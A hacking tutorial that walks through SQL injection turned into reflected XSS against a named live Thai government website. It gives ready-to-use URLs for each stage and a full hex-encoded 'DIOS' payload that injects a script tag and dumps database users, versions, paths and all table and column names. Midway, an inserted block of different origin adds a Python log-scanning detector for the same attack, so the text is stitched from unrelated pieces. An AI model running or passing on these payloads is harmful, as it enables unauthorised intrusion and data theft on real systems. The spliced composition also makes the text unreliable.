
TUTORIAL SQLI TO XSS CHALLENGE

 


Hello folks, it's me, Nekell404. This time I want to share a complete SQLi to XSS write-up.


Prepare the ingredients first:
1. A DIOS for XSS
2. A dork (find your own)
3. A SQL DIOS

Now let's go straight to the tutorial.

Live target = http://www.sanphudad.go.th/about.php?id=7


First we append a single quote (') or %27 to the parameter.

Example: http://www.sanphudad.go.th/about.php?id=7%27




There it is, an error.

Next we continue with +order+by+1--+-

Example: http://www.sanphudad.go.th/about.php?id=7%27+order+by+1--+-

It errors at number 10, so the query has 9 columns.



After that we use +union+select+1,2,3,4,5,6,7,8,9--+-

Don't forget to put a minus sign (-) in front of the parameter value.

Example: http://www.sanphudad.go.th/about.php?id=-7%27+union+select+1,2,3,4,5,6,7,8,9--+-



See, the magic numbers appear: 3 and 2 are the columns reflected on the page.

We prepare the DIOS first.

⟨DIOS⟩

concat%0b(0x3c5343524950543e70726f6d70742822,0x4b4953534544204259202e2f554355502d4b554e,0x5c6e,0x555345523a3a20,user(),0x5c6e,0x56455253494f4e3a3a20,version(),0x5c6e,0x44415441424153453a3a20,database(),0x5c6e,0x426173654469723a3a20,@@basedir,0x5c6e,0x46696c655f5049443a3a20,@@PID_FILE,0x5c6e,0x4f532053797374656d3a3a20,@@VERSION_COMPILE_OS,0x5c6e,0x4d616368696e652053797374656d3a3a20,@@VERSION_COMPILE_MACHINE,0x5c6e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat%0b(@x,0x207c7c20,table_name,0x203a3a20,column_name))))x),0x222c646f63756d656e742e636861726163746572536574293c2f7363726970743e)

After that we paste the DIOS into one of those magic numbers (3 or 2).

Example: http://www.sanphudad.go.th/about.php?id=-7%27+union+select+1,2,concat%0b(0x3c5343524950543e70726f6d70742822,0x4b4953534544204259202e2f554355502d4b554e,0x5c6e,0x555345523a3a20,user(),0x5c6e,0x56455253494f4e3a3a20,version(),0x5c6e,0x44415441424153453a3a20,database(),0x5c6e,0x426173654469723a3a20,@@basedir,0x5c6e,0x46696c655f5049443a3a20,@@PID_FILE,0x5c6e,0x4f532053797374656d3a3a20,@@VERSION_COMPILE_OS,0x5c6e,0x4d616368696e652053797374656d3a3a20,@@VERSION_COMPILE_MACHINE,0x5c6e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat%0b(@x,0x207c7c20,table_name,0x203a3a20,column_name))))x),0x222c646f63756d656e742e636861726163746572536574293c2f7363726970743e),4,5,6,7,8,9--+-
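As an added example that is not part of the original post, here is a small detector a site owner could run over web-server access logs to catch the stages of the walkthrough above. The log lines are constructed; the URL normalisation collapses the vertical tab behind concat%0b( and decodes the 0x literals, so the hidden <SCRIPT> tag and the information_schema read are visible to the rule.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original post); the
# query strings mirror the stages of the walkthrough above.
SAMPLE_LOGS = [
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /about.php?id=7 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /about.php?id=7%27 HTTP/1.1" 500 120',
    '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /about.php?id=7%27+order+by+10--+- HTTP/1.1" 500 120',
    '203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /about.php?id=-7%27+union+select+1,2,concat%0b(0x3c5343524950543e,user()),4--+- HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LITERAL_RE = re.compile(r'0x([0-9a-f]{2,})')

def normalize(url):
    """Percent-decode twice (catches double encoding) and collapse every
    whitespace character, including the vertical tab (%0b) that concat%0b(
    uses to dodge a naive 'concat(' match, into a single space."""
    decoded = unquote_plus(unquote_plus(url))
    return re.sub(r'\s+', ' ', decoded).lower()

def decode_hex_literals(text):
    """Decode MySQL 0x... literals so markup hidden in them becomes visible."""
    return [bytes.fromhex(h).decode('latin-1')
            for h in HEX_LITERAL_RE.findall(text) if len(h) % 2 == 0]

def classify(url):
    """Return the indicator names that one request URL triggers."""
    n = normalize(url)
    hits = []
    if "'" in n:
        hits.append('single_quote')
    if re.search(r"'\s*(?:order\s+by|union)\b", n) or re.search(r'\bunion\s+(?:all\s+)?select\b', n):
        hits.append('union_or_orderby_after_quote')
    if re.search(r'\bconcat\s*\(', n):
        hits.append('concat_with_whitespace_gap')
    if 'information_schema' in n:
        hits.append('information_schema_read')
    if any('<script' in s.lower() for s in decode_hex_literals(n)):
        hits.append('hex_literal_decodes_to_script_tag')
    return hits

def scan_log(lines):
    """Return (url, indicators) for every log line matching at least one indicator."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and classify(m.group(1)):
            findings.append((m.group(1), classify(m.group(1))))
    return findings
```

Any hit on the union, concat or script-tag indicators is worth an alert; the single-quote probe on its own is noisy and is better used to correlate with the 500 responses that follow it.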




And ta-da! Okay, that's all from me, Ucup, thanks...
